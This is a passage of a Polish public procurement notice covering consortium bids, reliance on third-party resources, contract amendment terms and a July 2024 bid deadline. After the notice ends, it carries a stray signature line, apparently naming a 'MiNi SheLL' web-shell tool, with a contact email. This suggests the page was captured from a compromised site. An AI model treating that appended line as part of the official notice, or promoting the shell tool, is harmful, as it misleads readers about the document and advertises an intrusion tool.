udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3. W przypadku, o którym mowa w ust. 2, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te usługi, do realizacji których te zdolności są<br/>wymagane.<br/>6. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>7. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>8. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego<br/>sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>9. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>10. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. jako konsorcjum).<br/>2. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.<br/>3. Wykonawcy występujący wspólnie (np. jako konsorcjum) muszą ustanowić pełnomocnika (lidera, pełnomocnika) do<br/>reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz<br/>zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z treści<br/>pełnomocnictwa.<br/>Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania !<br/>4. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem, pełnomocnikiem konsorcjum).<br/>5. Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu „np. nazwa i adres wykonawcy” należy wpisać dane dotyczące wszystkich uczestników konsorcjum, a nie tylko pełnomocnika<br/>konsorcjum.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty<br/>należy załączyć odpowiednie pełnomocnictwo), chyba że w przypadku spółki cywilnej, z umowy tej spółki wynika sposób jej<br/>reprezentowania (do stwierdzenia czego niezbędne będzie załączenie do oferty umowy spółki cywilnej). Wszelka<br/>korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym, jako pełnomocnik pozostałych.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie.<br/>Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>7. W przypadku wspólnego ubiegania się o zamówienie będące przedmiotem niniejszego postępowania przez kilku<br/>wykonawców, (konsorcjum, spółka cywilna), warunki udziału formalne, tj. warunek, aby nie być wykluczonym z ubiegania<br/>się o udzielenie zamówienia publicznego na podstawie art. 108 ust.1 ustawy Pzp oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, (Dz. U. 2022 poz. 835), zwana dalej „UOBN” musi być spełniony oddzielnie przez<br/>każdego z tych wykonawców.<br/>8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), wskazane wyżej warunki udziału w postępowaniu mogą spełniać łącznie. Warunek zostanie również uznany za spełniony, jeżeli jeden z wykonawców spełni warunek samodzielnie.<br/>9. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>10. W przypadku, o którym mowa w ust. 9, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Postanowienia umowy (która ma być zawarta w wyniku postępowania) a w szczególności wysokości kar umownych z tytułu niewykonania lub nienależytego wykonania umowy, dopuszczalne zmiany postanowień umowy, określenie warunków tych zmian oraz warunki płatności zawierają istotne postanowienia umowy dla każdej części, stanowiące zał. nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy: https://platformazakupowa.pl/pn/biecz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-18 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dotyczy: <br/>SEKCJA IV – PRZEDMIOT ZAMÓWIENIA<br/>4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: TAK - dotyczy części I i III.<br/><br/>SEKCJA VI - WARUNKI ZAMÓWIENIA<br/>6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: Tak - dotyczy części II i III.

Creat By MiNi SheLL
Email: jattceo@gmail.com